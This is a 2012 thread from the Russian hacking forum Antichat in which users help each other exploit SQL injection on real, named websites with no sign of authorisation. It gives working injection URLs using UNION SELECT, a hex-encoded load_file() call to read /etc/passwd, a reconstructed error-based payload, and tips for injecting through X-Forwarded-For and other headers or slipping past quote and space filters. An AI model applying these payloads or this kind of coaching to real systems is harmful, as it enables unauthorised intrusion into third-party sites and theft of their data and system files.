ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.10.2012, 22:55
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от RazyKK
RazyKK said:
В скрипте поиска кавычка выдает ошибку:
WHERE (name_ru LIKE '%'%' OR product_code LIKE '%'%') AND...
Как тут выполнить order by?
1: WHERE (name_ru LIKE '% name') order by{sql-запрос}#%' OR product_code LIKE '%'%') AND...
2: WHERE (name_ru LIKE '%'%' OR product_code LIKE '% name') order by{sql-запрос}'#%')AND...
P.S: Тут провидцев нет, давай урл и вывод ошибки!
|
|
|
06.10.2012, 08:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
1209
Репутация:
0
|
|
old.islam.kg/?i=1'&lg=kg
Помогите со скулей плз. Еще возможно IP записывает, так что..
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '77.245.182.175'' at line 1
p.s. ip конечно изменен |
|
|
|
06.10.2012, 10:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Там режутся пробелы, /**/, пробывал еще такие варианты - %09,%0A,%0B,%0C,%0D , при них запрос как бы "вырезается", фильтруются также (). Если найдеш способоб обойти фильтр пробелов, то скорейвсего раскрутишь если она не слепая конечно.
По ip еще, у меня сейчас нет возможности проверить, но попробуй сам отправить в хедерах свой X-FORWARDED-FOR с sql inj, если повезет и ip у них определяется именно так, то может там и условия получше будут.
|
|
|
|
08.10.2012, 12:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
1456
Репутация:
0
|
|
Скулю обработал - http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8 ,9,10,11+--+
но запара - фильтрация кавычек - file_priv считать ну никак не получается
|
|
|
|
08.10.2012, 12:46
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от trololoman96
trololoman96 said:
попробуй сам отправить в хедерах свой X-FORWARDED-FOR с sql inj, если повезет и ip у них определяется именно так, то может там и условия получше будут.
Кроме X-Forwarded-For можно попробовать Forwarded, X-Real-IP, Client-IP, HTTP-From, Via
|
|
|
|
08.10.2012, 16:16
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от SpiritDt
SpiritDt said:
Скулю обработал - http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8 ,9,10,11+--+
но запара - фильтрация кавычек - file_priv считать ну никак не получается
Нету доступа к mysql.user.
Что бы смотреть file_priv кавычки не нужны.
|
|
|
|
08.10.2012, 18:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
29647
Репутация:
1
|
|
есть какой-нибудь мануал или статья о том как залиться если file_priv=Y но magic_quotes_gpc = on
зы это читал ,но не понял логику запросов
/showpost.php?p=663815&postcount=39
|
|
|
|
08.10.2012, 20:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
289
Репутация:
0
|
|
Не могу раскрутить , хелп
http://www.l2db.ru/npc/index/2/rg/all/all/8/all/%5C%27
|
|
|
|
09.10.2012, 06:51
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от SpiritDt
SpiritDt said:
Скулю обработал - http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8 ,9,10,11+--+
но запара - фильтрация кавычек - file_priv считать ну никак не получается
Magic Quotes = On
Код:
Code:
http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,'10',11+--+
False
File_Priv=N
Код:
Code:
http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,load_file(0x2f6574632f706173737764),11+--+
False
Саму БД не смотрел - мож там админка есть...
Сообщение от blesse
blesse said:
есть какой-нибудь мануал или статья о том как залиться если file_priv=Y но magic_quotes_gpc = on
зы это читал ,но не понял логику запросов
/showpost.php?p=663815&postcount=39
Это прокатывает только при двойном запросе и то, при варианте, что данные передаваемые из первого запроса во второй дополнительно не фильтруются.
|
|
|
|
09.10.2012, 08:01
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Nikel3rN
Nikel3rN said:
Не могу раскрутить , хелп
http://www.l2db.ru/npc/index/2/rg/all/all/8/all/%5C%27
Тут вся проблема в том, что магические кавычки включены
Остаётся вариант Error-Based
Твой запрос имеет вид
Код:
Code:
SELECT m.*, m.name_ru AS subName, m.name_eng AS name, m.ext_id AS id FROM l2_monsters_rg AS m
JOIN l2_monsters_skills AS strt ON (strt.npc_id=m.ext_id and strt.skill_id=4309)
JOIN l2_drops_rg AS `drop` ON (`drop`.npc_id=m.id and `drop`.item_id in (SELECT id FROM l2_items_rg WHERE name_eng like '%[INJECT]')) WHERE m.lvl BETWEEN 21 and 30 AND m.name_eng!='' and m.type in ("warrior", "treasure", "boss", "zzoldagu", "") ORDER BY m.lvl;
и всё бы хорошо, в теории должен бы был проканать запрос вида
Код:
Code:
SELECT m.*, m.name_ru AS subName, m.name_eng AS name, m.ext_id AS id FROM l2_monsters_rg AS m
JOIN l2_monsters_skills AS strt ON (strt.npc_id=m.ext_id and strt.skill_id=4309)
JOIN l2_drops_rg AS `drop` ON (`drop`.npc_id=m.id and `drop`.item_id in (SELECT id FROM l2_items_rg WHERE name_eng like '%\\')) or (select count(*) from l2_drops_rg group by concat(version(),floor(rand(0)*2))+--+%'))
WHERE m.lvl BETWEEN 21 and 30 AND m.name_eng!='' and m.type in ("warrior", "treasure", "boss", "zzoldagu", "") ORDER BY m.lvl;
но в нашем случае хвост запроса не отбрасывается никаким способом. Во всяком случае - я пока не нашёл способа инъекта.
P.S. Поправьте меня, если я ошибаюсь.
P.S S. cat1vo красава ! А у меня сёдня бошка вообще не варит после картошки =(
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
